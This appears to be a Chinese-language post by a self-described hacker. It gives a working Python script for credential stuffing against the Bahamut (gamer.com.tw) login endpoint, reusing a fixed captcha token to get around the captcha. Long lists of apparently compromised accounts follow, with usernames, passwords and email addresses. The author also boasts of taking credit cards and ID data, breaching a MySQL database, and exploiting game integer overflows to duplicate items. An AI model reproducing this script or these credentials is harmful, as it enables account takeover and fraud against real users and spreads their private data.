現今的滲透
已經AI化了
各種腳本 打下網站
大多數公司都使用cloudflare了 本身是有限制某些特殊參數傳入數據庫
除非工程師程式邏輯有問題
就像是如今全球服精靈樂章 的 API 整數溢出 在內存中 輸入(65536 / 2 -1) 就能觸發
幻想神域 台服的轉帳系統異常一樣
都可以構成無限複製虛寶,販賣給玩家是有錢賺的。
某些網站的帳密數據洩漏例如巴哈姆特,可以間接造成大量網站的防禦功能失效。
台灣論壇巴哈姆特的防腳本Captcha存在漏洞,實際上不用點擊圖片就能無限制瘋狂登入測試帳密,對於駭客沒有起到防禦作用,頂多防治低端駭客。
以下是巴哈姆特的exploit
import requests
import re
def login_gamer(i: str, b: str):
url = "https://user.gamer.com.tw/ajax/do_login.php"
boundary = "----WebKitFormBoundary43kaavhQRXxSIS8T"
alternativeCaptcha="00fc6930b735e3cad682e0853a5e7de13b89d97fd3ec5ad167f2ba6b"
# Cookies boundary alternativeCaptcha 也要更新
cookies = {
"_ga": "GA1.1.1957928680.1732967366",
"ckM": "2531167198",
"buap_modr": "p014",
"buap_puoo": "p301",
"ckGUILD_lastBrowse": "[[%22393%22%2C%22%E6%AD%B7%E5%8F%B2%E3%81%AE%E7%B4%B3%E5%A3%AB%E5%85%AC%E6%9C%83<%E3%82%9D%CF%89%E3%83%BB%22]%2C[%2216197%22%2C%22%E5%A0%B4%E5%A4%96%E4%BA%BA%E7%94%9F%22]]",
"__cf_bm": "mKDJpSKveQTKgl_fc6yuPtBbSyXcrhujBogkMvHPNso-1734356145-1.0.1.1-Q4xXxyx1VD13BCae5ygrGeY76tskUbcg3HDEXHnwcFUld5j1UZ_lbQKNVUun8pDMU5CvDEDJrPkzKFVo9ivUpA",
}
headers = {
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36",
"Accept": "*/*",
"Accept-Encoding": "gzip, deflate, br, zstd",
"Accept-Language": "zh-TW,zh;q=0.9,ja-JP;q=0.8,ja;q=0.7",
"Cache-Control": "no-cache",
"Origin": "https://user.gamer.com.tw",
"Pragma": "no-cache",
"Referer": "https://user.gamer.com.tw/login.php",
"X-Requested-With": "XMLHttpRequest",
"Content-Type": f"multipart/form-data; boundary={boundary}"
}
body = (
f"--{boundary}\r\n"
"Content-Disposition: form-data; name=\"userid\"\r\n\r\n"
f"{i}\r\n"
f"--{boundary}\r\n"
"Content-Disposition: form-data; name=\"password\"\r\n\r\n"
f"{b}\r\n"
f"--{boundary}\r\n"
"Content-Disposition: form-data; name=\"autoLogin\"\r\n\r\n"
"T\r\n"
f"--{boundary}\r\n"
"Content-Disposition: form-data; name=\"alternativeCaptcha\"\r\n\r\n"
f"{alternativeCaptcha}\r\n"
f"--{boundary}\r\n"
"Content-Disposition: form-data; name=\"twoStepAuth\"\r\n\r\n"
"\r\n"
f"--{boundary}--\r\n"
)
response = requests.post(url, headers=headers, cookies=cookies, data=body.encode("utf-8"))
if '"error"' not in response.text:
print(f"✅ Username: {i}, Password: {b}, Status Code: {response.status_code}")
print("Response:", response.text)
if i in usernames:
usernames.remove(i)
with open("9999.txt", "w", encoding="utf-8") as f:
f.write('\n'.join(usernames) + '\n')
# 加入 99.txt
with open("99.txt", "a", encoding="utf-8") as f:
f.write(i + '\n')
elif '"CSRF_TOKEN_ERROR"' in response.text:
print(f"🚫 CSRF ERROR Username: {i}, Password: {b}, Status Code: {response.status_code}")
print("Response:", response.text)
return
with open("9999.txt", "r", encoding="utf-8") as file:
usernames = [line.strip() for line in file if line.strip()]
for i in usernames:
c = re.sub(r'[a-zA-Z]', 'a', i)
b = c.replace("aa", "a")
login_gamer(i, b)
以下是戰利品,簡簡單單的腳本可以造成如此可怕的破壞性。 可以將其拿去撞庫其他網站。
Username: aa0903465890, Password: a0903465890, Status Code: 200 a0903465890@gmail.com 動漫風
Response: {"data":{"status":1}}
Username: aa0952121590, Password: a0952121590, Status Code: 200 bodishenqi@gmail.com
Response: {"data":{"status":1}}
Username: b0909165363, Password: a0909165363, Status Code: 200 a0952148610@gmail.com
Response: {"data":{"status":1}}
Username: b0903892528, Password: a0903892528, Status Code: 200 b0903892528@gmail.com
Response: {"data":{"status":1}}
Username: w0906997609, Password: a0906997609, Status Code: 200 datealive24561715@gmail.com
Response: {"data":{"status":1}}
Username: ab0907711641, Password: a0907711641, Status Code: 200 a0932602130@gmail.com
Response: {"data":{"status":1}}
Username: b0985883382, Password: a0985883382, Status Code: 200 b0985883382@gmail.com
Response: {"data":{"status":1}}
Username: b0902445622, Password: a0902445622, Status Code: 200 a0902445622@gmail.com
Response: {"data":{"status":1}}
Username: q0968223897, Password: a0968223897, Status Code: 200 a0968223897@gmail.com
Response: {"data":{"status":1}}
Username: aa0910525, Password: a0910525, Status Code: 200 aa0928252609@gmail.com
Response: {"data":{"status":1}}
Username: e0973943179, Password: a0973943179, Status Code: 200 lovebaby19810802@gmail.com
Response: {"data":{"status":1}}
Username: aa0918681748, Password: a0918681748, Status Code: 200 love0918681748@gmail.com
Response: {"data":{"status":1}}
Username: st0986808392, Password: a0986808392, Status Code: 200 st882810@yahoo.com.tw
Response: {"data":{"status":1}}
Username: z0968954488, Password: a0968954488, Status Code: 200 gg122504531@gmail.com
Response: {"data":{"status":1}}
Username: q0935962575, Password: a0935962575, Status Code: 200 asdw95049@gmail.com
Response: {"data":{"status":1}}
Username: z0953956567, Password: a0953956567, Status Code: 200 a0953956567@gmail.com
Response: {"data":{"status":1}}
Username: aa0987890752, Password: a0987890752, Status Code: 200 young30987@gmail.com
Response: {"data":{"status":1}}
Username: as0906566327, Password: a0906566327, Status Code: 200 a0906566327@gmail.com
Response: {"data":{"status":1}}
Username: f0916727293, Password: a0916727293, Status Code: 200
Response: {"data":{"status":1}}
Username: b09158500, Password: a09158500, Status Code: 200 b0909158500@gmail.com
Response: {"data":{"status":1}}
Username: jy0907007336, Password: a0907007336, Status Code: 200 chizhengyou535@gmail.com
Response: {"data":{"status":1}}
Username: zx0980821344, Password: a0980821344, Status Code: 200 a0980821344@gmail.com
Response: {"data":{"status":1}}
Username: a709980792, Password: a709980792, Status Code: 200 msn709980792@gmail.com
Response: {"data":{"status":1}}
Username: l0903019107, Password: a0903019107, Status Code: 200 adwx83@gmail.com
Response: {"data":{"status":1}}
Username: gg0910288118, Password: a0910288118, Status Code: 200 louser9487@gmail.com
Response: {"data":{"status":1}}
Username: c0905610929, Password: a0905610929, Status Code: 200 a0905610929@gmail.com
Response: {"data":{"status":1}}
Username: c0968908771, Password: a0968908771, Status Code: 200 gavin62115@gmail.com
Response: {"data":{"status":1}}
Username: s097944987, Password: a097944987, Status Code: 200 jason930312@gmail.com
Response: {"data":{"status":1}}
Username: je0928511681, Password: a0928511681, Status Code: 200 a0928511681@gmail.com
Response: {"data":{"status":1}}
Username: ab0916543726, Password: a0916543726, Status Code: 200 chan92726@gmail.com
Response: {"data":{"status":1}}
Username: l0909340420, Password: a0909340420, Status Code: 200 a0909340420@gmail.com
Response: {"data":{"status":1}}
Username: os0984028800, Password: a0984028800, Status Code: 200
Response: {"data":{"status":1}}
Username: b0977300591, Password: a0977300591, Status Code: 200 a0977300591@gmail.com
Response: {"data":{"status":1}}
Username: aa0965107208, Password: a0965107208, Status Code: 200 a0965107208@gmail.com
Response: {"data":{"status":1}}
Username: aa0905795377, Password: a0905795377, Status Code: 200 aa0905795377@gmail.com
Response: {"data":{"status":1}}
Username: s0951115, Password: a0951115, Status Code: 200 s0951115@gmail.com
Response: {"data":{"status":1}}
Username: ji0966109453, Password: a0966109453, Status Code: 200 a0966109453@gmail.com
Response: {"data":{"status":1}}
Username: as0905427665, Password: a0905427665, Status Code: 200 a0905427665@gmail.com
Response: {"data":{"status":1}}
✅ Username: p090749499, Password: pp090749499, Status Code: 200 p090749499@gmail.com
Response: {"data":{"status":1}}
✅ Username: t0912287071, Password: tt0912287071, Status Code: 200 t091228.t7071@gmail.com
Response: {"data":{"status":1}}
✅ Username: j090276, Password: jj090276, Status Code: 200 j090276@my.cmsh.cyc.edu.tw
Response: {"data":{"status":1}}
✅ Username: aa0981073215, Password: aa0981073215, Status Code: 200 a0981073215@gmail.com
Response: {"data":{"status":1}}
✅ Username: l0990209, Password: l0990209, Status Code: 200 z6865105@gmail.com shipeicen992@gmail.com
Response: {"data":{"status":1}}
✅ Username: h10911218, Password: h10911218, Status Code: 200 kencatu@gmail.com
Response: {"data":{"status":1}}
✅ Username: m0976722676, Password: m0976722676, Status Code: 200 scorpio2014520@gmail.com
Response: {"data":{"status":1}}
✅ Username: j0905911501, Password: j0905911501, Status Code: 200 jeff29218829@gmail.com
Response: {"data":{"status":1}}
✅ Username: f0980466920, Password: f0980466920, Status Code: 200 poror81333@gmail.com
Response: {"data":{"status":1}}
✅ Username: s0987550111, Password: s0987550111, Status Code: 200 s0987550111@gmail.com
Response: {"data":{"status":1}}
以下密碼同帳號
ok0927719082 okok0927719082@gmail.com
m0965007291 s9007311@gmail.com
k0966525111 cruoen@gmail.com 2000-08-17 6889
k0963106226 k0963106226
aa0920686666 Aa0920686666@icloud.com
b0935429595 b0935429595@gmail.com
d09231202 willy5931@gmail.com
w0965572698
k0970283000 kaononog@gmail.com
vi0909211939 erli90889@gmail.com
js0975546884 js0975546884@gmail.com
s0970572524 w674961@gmail.com 這個
q0903571195 jay136001@gmail.com
aa0909503439 50014@thjh.tc.edu.tw
q0905394257 q0905394257@gmail.com
w0906181410
av0907325862 0963521qq@gmail.com 有
Username: aa09210035, Password: a09210035, Status Code: 200 a09210822@gmail.com
Response: {"data":{"status":1}}
Username: u0979254001, Password: a0979254001, Status Code: 200 unicorn0979254001@icloud.com
Response: {"data":{"status":1}}
Username: aa0912633373, Password: a0912633373, Status Code: 200 aa0912633373@gmail.com
Response: {"data":{"status":1}}
Username: q0911805750, Password: a0911805750, Status Code: 200 a0911805750@gmail.com
Response: {"data":{"status":1}}
Username: b0966176188, Password: a0966176188, Status Code: 200
Response: {"data":{"status":1}}
Username: ab0905292491, Password: a0905292491, Status Code: 200 abc092053@gmail.com
Response: {"data":{"status":1}}
Username: z0938918616, Password: a0938918616, Status Code: 200 a0938918616@gmail.com
Response: {"data":{"status":1}}
Username: aa0960960809, Password: a0960960809, Status Code: 200 love088613559@gmail.com
Response: {"data":{"status":1}}
Username: z0920194989, Password: a0920194989, Status Code: 200 a0920194989@gmail.com
Response: {"data":{"status":1}}
Username: z0909591313, Password: a0909591313, Status Code: 200 cmy0909591313@gmail.com
Response: {"data":{"status":1}}
Username: r0972880749, Password: a0972880749, Status Code: 200 r0972880749@gmail.com
Response: {"data":{"status":1}}
Username: ab0976681217, Password: a0976681217, Status Code: 200 a0976681217@gmail.com
Response: {"data":{"status":1}}
Username: aa0960300399, Password: a0960300399, Status Code: 200 a0960300399@gmail.com
Response: {"data":{"status":1}}
Username: b0903060747, Password: a0903060747, Status Code: 200 a0903060747@gmail.com
Response: {"data":{"status":1}}
Username: b0903559094, Password: a0903559094, Status Code: 200 a090355909432@gmail.com
Response: {"data":{"status":1}}
Username: k0933944907, Password: a0933944907, Status Code: 200 annime284@icloud.com
Response: {"data":{"status":1}}
Username: aa0905879083, Password: a0905879083, Status Code: 200 a0905879083@gmail.com
Response: {"data":{"status":1}}
Username: pe0988977410, Password: a0988977410, Status Code: 200 a0988977410@gmail.com
Response: {"data":{"status":1}}
Username: b0908279601, Password: a0908279601, Status Code: 200 csc908279601@gmail.com
Response: {"data":{"status":1}}
Username: m0905660182, Password: a0905660182, Status Code: 200 a0905660182@gmail.com
Response: {"data":{"status":1}}
Username: aa0908550262, Password: a0908550262, Status Code: 200 a0908550262@gmail.com -
Response: {"data":{"status":1}}
Username: as0966120010, Password: a0966120010, Status Code: 200 q0966120010@gmail.com -
Response: {"data":{"status":1}}
Username: b0965332258, Password: a0965332258, Status Code: 200 a0965332258@gmail.com -
Response: {"data":{"status":1}}
Username: t0909514986, Password: a0909514986, Status Code: 200 a0909514986@gmail.com -
Response: {"data":{"status":1}}
Username: aa0908365535, Password: a0908365535, Status Code: 200 b0908365535@gmail.com -
Response: {"data":{"status":1}}
Username: aa0980458882, Password: a0980458882, Status Code: 200 a871888@gmail.com
Response: {"data":{"status":1}}
Username: p0965494790, Password: a0965494790, Status Code: 200
Response: {"data":{"status":1}}
Username: yx0974043504, Password: a0974043504, Status Code: 200 a0974043504@gmail.com -
Response: {"data":{"status":1}}
Username: aa0979042990, Password: a0979042990, Status Code: 200 jess518313@yahoo.com
Response: {"data":{"status":1}}
Username: s0963566296, Password: a0963566296, Status Code: 200 a0963566296@yahoo.com.tw
Response: {"data":{"status":1}}
Username: s0928452731, Password: a0928452731, Status Code: 200 a0928452731@gmail.com st2630322@gmail.com -
Response: {"data":{"status":1}}
Username: aa0975285779, Password: a0975285779, Status Code: 200 a0975297472@gmail.com
Response: {"data":{"status":1}}
Username: z0911202824, Password: a0911202824, Status Code: 200
Response: {"data":{"status":1}}
Username: aa0989569855, Password: a0989569855, Status Code: 200 -acps91152@gmail.com -
Response: {"data":{"status":1}}
Username: aa0912660626, Password: a0912660626, Status Code: 200 -a060943@gmail.com
Response: {"data":{"status":1}}
Username: s0909070825, Password: a0909070825, Status Code: 200 a0909070825@gmail.com
Response: {"data":{"status":1}}
Username: s0936780533, Password: a0936780533, Status Code: 200
Response: {"data":{"status":1}}
Username: b0979580968, Password: a0979580968, Status Code: 200 b0979580968@gmail.com -
Response: {"data":{"status":1}}
Username: ab0902101002, Password: a0902101002, Status Code: 200 aa0902101002@gmail.com
Response: {"data":{"status":1}}
Username: b0985430586, Password: a0985430586, Status Code: 200 a0985430586@gmail.com
Response: {"data":{"status":1}}
Username: aa0906730857, Password: a0906730857, Status Code: 200
Response: {"data":{"status":1}}
Username: aa0963756676, Password: a0963756676, Status Code: 200 a0963756676@gmail.com -
Response: {"data":{"status":1}}
Username: q0981388805, Password: a0981388805, Status Code: 200 weileyhu0813@yahoo.com.tw -
Response: {"data":{"status":1}}
Username: w0908450298, Password: a0908450298, Status Code: 200 rex930504@gmail.com
Response: {"data":{"status":1}}
Username: r0980018123, Password: a0980018123, Status Code: 200 -
Response: {"data":{"status":1}}
Username: sa0981232712, Password: a0981232712, Status Code: 200 sa0981232712@gmail.com
Response: {"data":{"status":1}}
Username: q0903738680, Password: a0903738680-, Status Code: 200 a0903738680@gmail.com
Response: {"data":{"status":1}}
Username: s0973886245, Password: a0973886245, Status Code: 200 s0973886245@gmail.com -
Response: {"data":{"status":1}}
Username: aa0900413183, Password: a0900413183, Status Code: 200 dog970dog@yahoo.com.tw
Response: {"data":{"status":1}}
Username: aa0921781869, Password: a0921781869, Status Code: 200 sxiao6071@gmail.com
Response: {"data":{"status":1}}
Username: q0970788600, Password: a0970788600, Status Code: 200 aaa0970788600@gmail.com -
Response: {"data":{"status":1}}
Username: aa0903828673, Password: a0903828673, Status Code: 200 C107113210@nkust.edu.tw
Response: {"data":{"status":1}}
Username: t0972811154, Password: a0972811154, Status Code: 200 t0972811154@gmail.com -
Response: {"data":{"status":1}}
Username: aa0986199269, Password: a0986199269, Status Code: 200 doublew0423@gmail.com
Response: {"data":{"status":1}}
Username: z0970566527, Password: a0970566527, Status Code: 200 hunhun168168268@gmail.com
Response: {"data":{"status":1}}
Username: z0988257795, Password: a0988257795, Status Code: 200 a0988257795@gmail.com
Response: {"data":{"status":1}}
Username: aa0939282769, Password: a0939282769, Status Code: 200 axz123123@gmail.com
Response: {"data":{"status":1}}
Username: z0952070619, Password: a0952070619, Status Code: 200 a0952070619@gmail.com -
Response: {"data":{"status":1}}
Username: ab0970763930, Password: a0970763930, Status Code: 200 a0970763930@icloud.com
Response: {"data":{"status":1}}
Username: s0905180925, Password: a0905180925, Status Code: 200 a0905180925@gmail.com
Response: {"data":{"status":1}}
Username: c0906522264, Password: a0906522264, Status Code: 200 a0906522264@gmail.com
Response: {"data":{"status":1}}
Username: b0932729141, Password: a0932729141, Status Code: 200 a0932729141@gmail.com
Response: {"data":{"status":1}}
Username: z0920212123, Password: a0920212123, Status Code: 200 sp40384579@gmail.com
Response: {"data":{"status":1}}
Username: aa0925093877, Password: a0925093877, Status Code: 200 a0925093877@gmail.com
Response: {"data":{"status":1}}
Username: lj0965137654, Password: a0965137654, Status Code: 200 melody19991018@gmail.com
Response: {"data":{"status":1}}
Username: bo0906364202, Password: a0906364202, Status Code: 200 continue88@yahoo.com.tw
Response: {"data":{"status":1}}
Username: aa0979767832, Password: a0979767832, Status Code: 200 a080888888@gmail.com
Response: {"data":{"status":1}}
Username: aa0979619251, Password: a0979619251, Status Code: 200 aa0979619251@gmail.com
Response: {"data":{"status":1}}
Username: b0972808320, Password: a0972808320, Status Code: 200 a0972808320@gmail.com
Response: {"data":{"status":1}}
Username: as0986307029, Password: a0986307029, Status Code: 200 as0986307029@gmail.com
Response: {"data":{"status":1}}
Username: ab0976744597, Password: a0976744597, Status Code: 200 a0976744597@gmail.com
Response: {"data":{"status":1}}
Username: b0907746473, Password: a0907746473, Status Code: 200 a0907746473@gmail.com
Response: {"data":{"status":1}}
Username: z09781279, Password: a09781279, Status Code: 200 xx192922@gmail.com
Response: {"data":{"status":1}}
Username: j0978099261, Password: a0978099261, Status Code: 200 smile0978099265@yahoo.com.tw
Response: {"data":{"status":1}}
Username: aa0939015430, Password: a0939015430, Status Code: 200 a0939015430@gmail.com
Response: {"data":{"status":1}}
Username: s0965005858, Password: a0965005858, Status Code: 200 a0965005858@gmail.com
Response: {"data":{"status":1}}
Username: aa0905664221, Password: a0905664221, Status Code: 200
Response: {"data":{"status":1}}
但是!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
打下帳號頂多獲得facebook,身分證.信用卡等等,我確實拿到了信用卡好幾張2張過期 3張未過期,但是他們共同點,無法使用。
也沒有勒索功能。純屬自嗨!?
滲透mysql庫呢,去年我打下了一個mysql庫,他被滲透原因,把mysql庫的密碼,寫在客戶端,被我逆向取出。
也沒有勒索價值,mysql庫權限十分嚴格,我無法提權到系統root 只有mysql的root。
或許我應該去打企業或是更高價值的地方。